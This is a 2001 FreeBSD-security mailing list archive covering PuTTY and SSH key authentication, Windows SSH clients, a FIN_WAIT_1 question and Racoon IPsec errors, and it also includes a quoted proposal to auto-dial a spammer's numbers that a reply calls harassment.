Fri, 26 Oct 2001 11:27:59 -0400 From: Harry Tabak Reply-To: htabak@quadtelecom.com X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Steve Littleford Cc: security@freebsd.org Subject: Re: Toner Cartridges References: <3BD59381.1000500@all.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org IANAL, but I believe the attact that you are proposing is considered harassment and would leave you exposed to both criminal and civil liability. And yes, your calls can be traced. - Harry Steve Littleford wrote: > > Everyone, > > I know spam is a fact of life, but these guys have a reputation for > being jerks (or Toner weasels, if you prefer). > http://www.ecst.csuchico.edu/~atman/spam/ > > > **** VORTEX SUPPLIES **** > > ... > > > ORDER BY PHONE:1-888-288-9043 > > > ORDER BY FAX: 1-888-977-1577 > > E-MAIL REMOVAL LINE: 1-888-494-8597 > > > Since this is a security list, could someone tell me what security > problems I might run into if my FreeBSD machine were configured to call > these 1-888 numbers continually? Aside from the hardware about two or > three modems? Is it possible to assign this task to a non-root thread? > > > -Steve > > (gee, what do I do with these spare modems and Digi-Board?) > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:45:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from sln.esc.edu (sln.esc.edu [138.116.200.3]) by hub.freebsd.org (Postfix) with ESMTP id CC3F237B403 for ; Fri, 26 Oct 2001 08:45:42 -0700 (PDT) To: Rasputin Cc: security@freebsd.org Subject: Re: Putty & SSH X-Mailer: Lotus Notes Release 5.0.2c February 2, 2000 Message-ID: From: Bill.Melvin@esc.edu Date: Fri, 26 Oct 2001 11:41:36 -0400 X-MIMETrack: Serialize by Router on sln.esc.edu/SUNY(Release 5.0.2c |February 2, 2000) at 10/26/2001 11:44:22 AM, Serialize complete at 10/26/2001 11:44:22 AM MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > If you just want to save yourself a lot of greif, try teraterm > with the ttssh plugin - see: > http://www.zip.com.au/~roca/ttssh.html > Not sure if it's any better, but it's a free 5 minute download to > find out :) Doesnt do Protocol 2 ... From the top of the above link. "Many people ask me whether or not TTSSH will support SSH protocol version 2. It does not and (unless someone else decides to try) it will not. Sorry, I don't have time to do it. Please don't ask me about it." You can still do 1 with a FreeBSD sshd but you are rolling the dice on the CRC-32 patches to the daemon (TTSSH itself claims not to be vulnerable). (below for the "L4m3rz use Windows/Grow up, I have to use Windows" debate that inevitably follows every "Windows SSH client" question on this list :-) The Cygwin kit (http://www.cygwin.com) uses OpenSSH 2.9.9p2 at least plus gives you a "real" shell and utilities if you dont mind the GPL. /b To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 8:52:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from dreamflow.nl (dreamflow.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id 1D40237B407 for ; Fri, 26 Oct 2001 08:52:11 -0700 (PDT) Received: (qmail 24470 invoked by uid 1000); 26 Oct 2001 15:52:09 -0000 Date: Fri, 26 Oct 2001 17:52:09 +0200 From: Bart Matthaei To: freebsd-security@freebsd.org Subject: Re: Putty & SSH Message-ID: <20011026175209.A24453@heresy.dreamflow.nl> Reply-To: Bart Matthaei References: <20011026110707.B7631@corona.cs.wm.edu> <20011026111311.C7631@corona.cs.wm.edu> <20011026162203.A20432@shikima.mine.nu> <20011026113108.A7849@corona.cs.wm.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026113108.A7849@corona.cs.wm.edu>; from zvezdan@CS.WM.EDU on Fri, Oct 26, 2001 at 11:31:14AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 11:31:14AM -0400, Zvezdan Petkovic wrote: [snap] > I save myself grief by not using Windows :-) This is a securitylist. Not a unix <-> windows flamewall. :) Regards, Bart -- Bart Matthaei bart@dreamflow.nl /* Welcome to my world.. You just live in it */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 9: 7:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from va.cs.wm.edu (va.cs.wm.edu [128.239.2.31]) by hub.freebsd.org (Postfix) with ESMTP id 28E9537B401 for ; Fri, 26 Oct 2001 09:07:51 -0700 (PDT) Received: from corona.cs.wm.edu (corona [128.239.2.50]) by va.cs.wm.edu (8.11.4/8.9.1) with ESMTP id f9QG6Wq10547 for ; Fri, 26 Oct 2001 12:06:36 -0400 (EDT) Received: (from zvezdan@localhost) by corona.cs.wm.edu (8.11.6/8.9.1) id f9QG7kk07934 for freebsd-security@FreeBSD.ORG; Fri, 26 Oct 2001 12:07:46 -0400 Date: Fri, 26 Oct 2001 12:07:46 -0400 From: Zvezdan Petkovic To: freebsd-security@FreeBSD.ORG Subject: Re: Putty & SSH Message-ID: <20011026120745.A7897@corona.cs.wm.edu> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20011026110707.B7631@corona.cs.wm.edu> <20011026111311.C7631@corona.cs.wm.edu> <20011026162203.A20432@shikima.mine.nu> <20011026113108.A7849@corona.cs.wm.edu> <20011026175209.A24453@heresy.dreamflow.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026175209.A24453@heresy.dreamflow.nl>; from bart@dreamflow.nl on Fri, Oct 26, 2001 at 05:52:09PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 05:52:09PM +0200, Bart Matthaei wrote: > On Fri, Oct 26, 2001 at 11:31:14AM -0400, Zvezdan Petkovic wrote: > [snap] > > I save myself grief by not using Windows :-) > > This is a securitylist. Not a unix <-> windows flamewall. :) Wasn't intended as a flame. Sorry if somebody perceived it that way. If you look at the thread you'll see that I tried to offer some constructive advice on how to convert between OpenSSH<->SECSH pub key formats. That might, or might not have been helpful to the original poster. You sound as an adult reprimanding a kid who's smirking at people. I'm using UNIX for over 12 years, and that is a "natural habitat" for me. _I_ would probably be in a lot of grief trying to switch to Win. That definitely does _not_ necessarily hold for other people. I'm sorry for misunderstanding. -- Zvezdan Petkovic http://www.cs.wm.edu/~zvezdan/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 9:19:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from topperwein.dyndns.org (acs-24-154-28-168.zoominternet.net [24.154.28.168]) by hub.freebsd.org (Postfix) with ESMTP id 546EE37B407 for ; Fri, 26 Oct 2001 09:19:41 -0700 (PDT) Received: from topperwein.dyndns.org (topperwein.dyndns.org [192.168.168.10]) by topperwein.dyndns.org (8.11.6/8.11.6) with ESMTP id f9QGJil03883 for ; Fri, 26 Oct 2001 12:19:44 -0400 (EDT) (envelope-from behanna@zbzoom.net) Date: Fri, 26 Oct 2001 12:19:39 -0400 (EDT) From: Chris BeHanna Reply-To: Chris BeHanna To: Subject: Re: Putty & SSH In-Reply-To: <20011026110707.B7631@corona.cs.wm.edu> Message-ID: <20011026121148.H3805-100000@topperwein.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Fri, Oct 26, 2001 at 10:39:52AM -0400, Bill.Melvin@esc.edu wrote: > > > I try to connect from my M$ to a Freebsd Box using Putty via > > > SSH. The keys were produced with the normal procedure > > > under BSD ... I've found that using pagent to cache the keys allows you to do what you want to do (much like ssh-agent works on real operating systems--and, as mentioned, Cygwin has real ssh, including a real ssh-agent, and you can even run sshd and get into your Windows box remotely, but only as the currently-logged-in user). -- Chris BeHanna Software Engineer (Remove "bogus" before responding.) behanna@bogus.zbzoom.net I was raised by a pack of wild corn dogs. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 9:27:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from kosh.etchings.com (kosh.etchings.com [216.231.38.40]) by hub.freebsd.org (Postfix) with ESMTP id 0282A37B405 for ; Fri, 26 Oct 2001 09:27:42 -0700 (PDT) Received: by kosh.etchings.com (Postfix, from userid 1000) id 524C4117040; Fri, 26 Oct 2001 09:27:41 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by kosh.etchings.com (Postfix) with ESMTP id 5144011703F; Fri, 26 Oct 2001 09:27:41 -0700 (PDT) Date: Fri, 26 Oct 2001 09:27:41 -0700 (PDT) From: Brian Kraemer To: Tom Beer Cc: Subject: Re: Putty & SSH In-Reply-To: <006801c15dee$471d80c0$0901a8c0@system> Message-ID: <20011026092247.P2138-100000@kosh.etchings.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The putty developers had/have some security concerns with DSA keys (what most ssh 2.0 implementations use) so they don't support them. There is hope however; Here's an exchange I had with one of the putty developers. -Brian Date: Thu, 13 Sep 2001 08:58:33 +0100 From: Simon Tatham To: Brian Kraemer Subject: Re: [putty]public key authentication for ssh 2 Brian Kraemer wrote: > The section about DSA keys in your "non-wish list" on the putty web page > seems to indicate that public key authentication for ssh 2 is not > implemented at all (and probably won't be). Is this a true statement? Not any more. It was at the time of the 0.51 release, but since then the major SSH server implementors have introduced the possibility of RSA keys in SSH 2, and the development snapshots of PuTTY and PuTTYgen do support it, as will the upcoming 0.52 release. > Can you use RSA (or another type) keys with ssh 2? Sorry, I'm not > completely up to speed on all the workings of SSH/SSH2. That's perfectly all right. SSH 2 has inherent support for multiple key types, but RSA was only introduced to the drafts fairly recently, so you could easily be forgiven for not having known about it yet :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 9:56:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from gatehouse.quadtelecom.com (ool-18bd6caa.dyn.optonline.net [24.189.108.170]) by hub.freebsd.org (Postfix) with SMTP id 038E537B401 for ; Fri, 26 Oct 2001 09:56:39 -0700 (PDT) Received: (qmail 56204 invoked from network); 26 Oct 2001 16:49:46 -0000 Received: from 49.baltimore-03rh16rt.md.dial-access.att.net (HELO quadtelecom.com) (12.79.109.49) by 26.mumf.nyrk.nycenycp.dsl.att.net with SMTP; 26 Oct 2001 16:49:46 -0000 Message-ID: <3BD99429.FEC70F35@quadtelecom.com> Date: Fri, 26 Oct 2001 12:49:45 -0400 From: Harry Tabak Reply-To: htabak@quadtelecom.com X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Tom Beer Cc: security@FreeBSD.ORG Subject: Re: Putty & SSH References: <006801c15dee$471d80c0$0901a8c0@system> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have been able to successfully use Putty to access a FBSD box using SSH1. I used the RSA defaults to get an identity and identity.pub files and I copied the identity.pub to authorized_keys. Your problems seem to be sort of config issue. Is putty configured to provide the your logon name, and the identity file's location. I have not been sucessful using SSH2. - Harry Tom Beer wrote: > > Hi, > > I try to connect from my M$ to a Freebsd Box using Putty via > SSH. The keys were produced with the normal procedure > under BSD. However, it is not possible to connect without entering > a user name and password. This fails, cause I only want to connect > via the ssh key and configured sshd in that way. The log on BSD reads as > follows: > > Oct 25 14:18:14 strawberry sshd[158]: debug1: Forked child 15696. > Oct 25 14:18:14 strawberry sshd[15696]: Connection from laptop.system port > 1426 > Oct 25 14:18:14 strawberry sshd[15696]: Connection from 192.168.1.9 port > 1426 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Client protocol version 2.0; > client software version PuTTY > Oct 25 14:18:14 strawberry sshd[15696]: debug1: no match: PuTTY > Oct 25 14:18:14 strawberry sshd[15696]: Enabling compatibility mode for > protocol 2.0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Local version string > SSH-2.0-OpenSSH_2.3.0 green@FreeBSD.org 20010321 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: send KEXINIT > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done > Oct 25 14:18:14 strawberry sshd[15696]: debug1: wait KEXINIT > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > diffie-hellman-group1-sha1 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: ssh-dss > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > 3des-cbc,blowfish-cbc,3des-cbc > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > 3des-cbc,blowfish-cbc,3des-cbc > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > hmac-sha1,hmac-md5,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > hmac-sha1,hmac-md5,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: > Oct 25 14:18:14 strawberry sshd[15696]: debug1: first kex follow: 0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: reserved: 0 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done > Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: client->server 3des-cbc > hmac-sha1 none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: kex: server->client 3des-cbc > hmac-sha1 none > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_KEXDH_INIT. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 521/1024 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: bits set: 497/1024 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: sig size 20 20 > Oct 25 14:18:14 strawberry sshd[15696]: debug1: send SSH2_MSG_NEWKEYS. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: done: send SSH2_MSG_NEWKEYS. > Oct 25 14:18:14 strawberry sshd[15696]: debug1: Wait SSH2_MSG_NEWKEYS. > Oct 25 14:18:15 strawberry sshd[15696]: debug1: GOT SSH2_MSG_NEWKEYS. > Oct 25 14:18:15 strawberry sshd[15696]: debug1: done: KEX2. > Oct 25 14:18:17 strawberry sshd[15696]: fatal: Read from socket failed: > Connection reset by peer > Oct 25 14:18:17 strawberry sshd[15696]: debug1: Calling cleanup > 0x805e72c(0x0) > > Any pointers would be highly appreciated Tom > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 10:39:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from dreamflow.nl (dreamflow.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id B4AD837B403 for ; Fri, 26 Oct 2001 10:39:06 -0700 (PDT) Received: (qmail 24650 invoked by uid 1000); 26 Oct 2001 17:39:05 -0000 Date: Fri, 26 Oct 2001 19:39:05 +0200 From: Bart Matthaei To: freebsd-security@freebsd.org Subject: Re: Putty & SSH Message-ID: <20011026193905.A24636@heresy.dreamflow.nl> Reply-To: Bart Matthaei References: <20011026110707.B7631@corona.cs.wm.edu> <20011026111311.C7631@corona.cs.wm.edu> <20011026162203.A20432@shikima.mine.nu> <20011026113108.A7849@corona.cs.wm.edu> <20011026175209.A24453@heresy.dreamflow.nl> <20011026120745.A7897@corona.cs.wm.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011026120745.A7897@corona.cs.wm.edu>; from zvezdan@CS.WM.EDU on Fri, Oct 26, 2001 at 12:07:46PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Oct 26, 2001 at 12:07:46PM -0400, Zvezdan Petkovic wrote: [snip] > Wasn't intended as a flame. Sorry if somebody perceived it that way. I didn't. I just wanted to make sure no windows sucks discussion would start with this post :) > If you look at the thread you'll see that I tried to offer some > constructive advice on how to convert between OpenSSH<->SECSH pub key > formats. That might, or might not have been helpful to the original > poster. I know :) It wasnt ment offencing.. Your doing a great job ;) > You sound as an adult reprimanding a kid who's smirking at people. > I'm using UNIX for over 12 years, and that is a "natural habitat" for > me. _I_ would probably be in a lot of grief trying to switch to Win. > That definitely does _not_ necessarily hold for other people. Like isaid.. I wasnt reprimanding :) I was only covering my ass from getting loads of windows sucks spam in my mailbox ;) > I'm sorry for misunderstanding. There wasn't any ;) Regards, Bart -- Bart Matthaei bart@dreamflow.nl /* Welcome to my world.. You just live in it */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 11:15: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from web11803.mail.yahoo.com (web11803.mail.yahoo.com [216.136.172.157]) by hub.freebsd.org (Postfix) with SMTP id E57E037B401 for ; Fri, 26 Oct 2001 11:15:01 -0700 (PDT) Message-ID: <20011026181501.39456.qmail@web11803.mail.yahoo.com> Received: from [64.73.64.94] by web11803.mail.yahoo.com via HTTP; Fri, 26 Oct 2001 11:15:01 PDT Date: Fri, 26 Oct 2001 11:15:01 -0700 (PDT) From: X Philius Reply-To: xphilius@yahoo.com Subject: Free SSH2 client for Windows that actually works with DSA public key auth To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Folks, This is in reference to the recent posts about Putty and SSH etc. I have been using a free windows client (I guess really a DOS client) to access my FreeBSD box, and as the subject cuggests, it seems to work fine with SSH2, and DSA public key authentication. I have not managed to get any of the other free clients mentioned to work with DSA public key auth, except for this one. Only drawback is that there is no GUI, but with this crowd, that is hardly a drawback ;-) In anycase, I have no idea how reputable these folks are, I found this randomly searching the web, but the client works exactly like Open SSH on FreeBSD (it is based on the cygwin dll, I believe), and I even used the key-gen utility on my PC to make the key. The only prob I have is that the termcap settings he provides don't work quite right, vi gets wierd sometimes. I'll post a question about termcap settings on the questions list. Here's the link to the site. http://www.networksimplicity.com/ Jason __________________________________________________ Do You Yahoo!? Make a great connection at Yahoo! Personals. http://personals.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 11:30:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from web14606.mail.yahoo.com (web14606.mail.yahoo.com [216.136.224.86]) by hub.freebsd.org (Postfix) with SMTP id CB70037B407 for ; Fri, 26 Oct 2001 11:30:37 -0700 (PDT) Message-ID: <20011026183037.11581.qmail@web14606.mail.yahoo.com> Received: from [66.156.9.33] by web14606.mail.yahoo.com via HTTP; Fri, 26 Oct 2001 11:30:37 PDT Date: Fri, 26 Oct 2001 11:30:37 -0700 (PDT) From: Jerry Murdock Subject: Re: Free SSH2 client for Windows that actually works with DSA public key auth To: xphilius@yahoo.com, freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Folks, > This is in reference to the recent posts about Putty and SSH etc. I > have been using a free windows client (I guess really a DOS client) to > access my FreeBSD box, and as the subject cuggests, it seems to work > fine with SSH2, and DSA public key authentication. I have not managed > to get any of the other free clients mentioned to work with DSA public > key auth, except for this one. Only drawback is that there is no GUI, > but with this crowd, that is hardly a drawback ;-) In anycase, I have > no idea how reputable these folks are, I found this randomly searching > the web, but the client works exactly like Open SSH on FreeBSD (it is > based on the cygwin dll, I believe), and I even used the key-gen > utility on my PC to make the key. The only prob I have is that the > termcap settings he provides don't work quite right, vi gets wierd > sometimes. I'll post a question about termcap settings on the questions > list. Here's the link to the site. > > http://www.networksimplicity.com/ > > Jason Also, I use Cygwin's RXVT (and xterm - but doesn;t require x be installed with Cygwin), and the OpenSSH included with CygWin.1 Works great. www.cygwin.com Jerry __________________________________________________ Do You Yahoo!? Make a great connection at Yahoo! Personals. http://personals.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 12:53:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.chartertn.net (smtp1.chartertn.net [24.158.96.12]) by hub.freebsd.org (Postfix) with SMTP id B395737B405 for ; Fri, 26 Oct 2001 12:53:34 -0700 (PDT) Received: (qmail 59370 invoked from network); 26 Oct 2001 19:19:48 -0000 Received: from jc-c-24-158-136-130.chartertn.net (HELO 2xyyg01) (24.158.136.130) by smtp1.chartertn.net with SMTP; 26 Oct 2001 19:19:48 -0000 Message-ID: <000a01c15e6a$f1ed7560$82889e18@chartertn.net> From: "Xhemile Qosja" To: Subject: Date: Fri, 26 Oct 2001 15:09:55 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01C15E30.44EFEC60" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0007_01C15E30.44EFEC60 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable why FIN_WAIT_1 is a potential security hole? ------=_NextPart_000_0007_01C15E30.44EFEC60 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
why FIN_WAIT_1 is a potential security=20 hole?
------=_NextPart_000_0007_01C15E30.44EFEC60-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 13: 5:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail1.toronto.istar.net (mail1.toronto.istar.net [209.89.75.17]) by hub.freebsd.org (Postfix) with ESMTP id 62BFE37B401 for ; Fri, 26 Oct 2001 13:05:39 -0700 (PDT) Received: from d141-119-162.home.cgocable.net ([24.141.119.162] helo=x1-6-00-50-ba-de-36-33.kico1.on.home.com) by mail1.toronto.istar.net with esmtp (Exim 2.02 #1) id 15xDEX-0006oV-00; Fri, 26 Oct 2001 16:05:37 -0400 Received: from localhost (genisis@localhost) by x1-6-00-50-ba-de-36-33.kico1.on.home.com (8.11.6/8.11.6) with ESMTP id f9QKBKh13269; Fri, 26 Oct 2001 16:11:20 -0400 (EDT) (envelope-from genisis@istar.ca) X-Authentication-Warning: x1-6-00-50-ba-de-36-33.kico1.on.home.com: genisis owned process doing -bs Date: Fri, 26 Oct 2001 16:09:56 -0400 (EDT) From: Dru X-X-Sender: To: Xhemile Qosja Cc: Subject: Re: your mail In-Reply-To: <000a01c15e6a$f1ed7560$82889e18@chartertn.net> Message-ID: <20011026160913.O13236-100000@x1-6-00-50-ba-de-36-33.kico1.on.home.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 26 Oct 2001, Xhemile Qosja wrote: > why FIN_WAIT_1 is a potential security hole? > A quick google search reveals this link: http://cert.uni-stuttgart.de/archive/bugtraq/2001/07/msg00544.html Dru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 16: 9:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from boromir.vpop.net (dns1.vpop.net [206.117.147.2]) by hub.freebsd.org (Postfix) with ESMTP id 0523437B403 for ; Fri, 26 Oct 2001 16:09:44 -0700 (PDT) Received: from vpop.net (bilbo.vpop.net [63.231.252.113]) by boromir.vpop.net (8.11.4/8.11.4) with ESMTP id f9QN9cR96969; Fri, 26 Oct 2001 16:09:39 -0700 (PDT) (envelope-from mreimer@vpop.net) Message-ID: <3BD9EDE2.9944FB32@vpop.net> Date: Fri, 26 Oct 2001 18:12:34 -0500 From: Matthew Reimer Organization: VPOP Technologies, Inc. X-Mailer: Mozilla 4.78 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: Racoon IPSEC issues References: Content-Type: multipart/mixed; boundary="------------63E07C416784556870518E97" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. --------------63E07C416784556870518E97 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Attached is a simple patch that fixes it for me. Matt Colin Legendre wrote: > > I started having this problem with a win2k-freebsd4.4 setup. It was working > fine until I upgraded racoon from 20010831a to 20011016a then this problem > started. > > BTW any idea how to roll back to racoon 20010831a? > > Colin Legendre CCNA, MCP > sudz@ns3g.com > http://www.ns3g.com > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Eric Anderson > Sent: Thursday, September 06, 2001 10:03 AM > To: freebsd-security@FreeBSD.ORG > Subject: Racoon IPSEC issues > > Ok, I have been setting up VPN's using IPSEC tunnel mode (ESP) with > Racoon on FreeBSD 4.2 for some time now. I have 4 currently running > just fine, and the 3 newest VPN don't work. It appears as though the > Racoon's aren't talking to each other correctly. I have 1 VPN "server" > that all the clients connect to, and the clients are small machines > running from compact flash cards (a stripped down 30Mb freebsd 4.2 > setup). I use the GIF interfaces to connect the vpn's together. I have > gif0,1,3,4 are connected to VPN's that are up and running. Not that the > gif's have anything to do with it, just extra info. Is there something > I'm missing? I have tried configuring the non-working boxes just like > the working ones, etc. I'm out of ideas! > > Here are some blurps from my logs on the vpn "server" box: > > 2001-09-06 08:51:55: INFO: isakmp.c:965:isakmp_ph2begin_r(): responde > new phase 2 negotiation: xx.yy.zz.60[0]<=>xx.yy.zz.128[0] > 2001-09-06 08:51:55: ERROR: proposal.c:951:set_proposal_from_policy(): > not supported nested SA. Ignore. > 2001-09-06 08:51:55: ERROR: proposal.c:999:set_proposal_from_policy(): > There is a difference between the in/out bound policies. > 2001-09-06 08:51:55: ERROR: isakmp_quick.c:1901:get_proposal_r(): failed > to create saprop. > 2001-09-06 08:51:55: ERROR: isakmp_quick.c:1025:quick_r1recv(): failed > to get proposal for responder. > 2001-09-06 08:51:55: ERROR: isakmp.c:975:isakmp_ph2begin_r(): failed to > pre-process packet. > 2001-09-06 08:52:00: INFO: isakmp.c:1618:isakmp_post_acquire(): request > for establishing IPsec-SA was queued due to no phase1 found. > 2001-09-06 08:52:19: INFO: isakmp.c:854:isakmp_ph1begin_r(): responde > new phase 1 negotiation: xx.yy.zz.60[500]<=>xx.yy.zz.128[500] > 2001-09-06 08:52:19: INFO: isakmp.c:859:isakmp_ph1begin_r(): begin > Aggressive mode. > 2001-09-06 08:52:20: INFO: isakmp.c:2313:log_ph1established(): ISAKMP-SA > established xx.yy.zz.60[500]-xx.yy.zz.128[500] spi:9c0e0730a89724fc:3 > 4e869a34c12cf49 > 2001-09-06 08:52:21: INFO: isakmp.c:965:isakmp_ph2begin_r(): responde > new phase 2 negotiation: xx.yy.zz.60[0]<=>xx.yy.zz.128[0] > 2001-09-06 08:52:21: ERROR: proposal.c:951:set_proposal_from_policy(): > not supported nested SA. Ignore. > 2001-09-06 08:52:21: ERROR: proposal.c:999:set_proposal_from_policy(): > There is a difference between the in/out bound policies. > 2001-09-06 08:52:21: ERROR: isakmp_quick.c:1901:get_proposal_r(): failed > to create saprop. > 2001-09-06 08:52:21: ERROR: 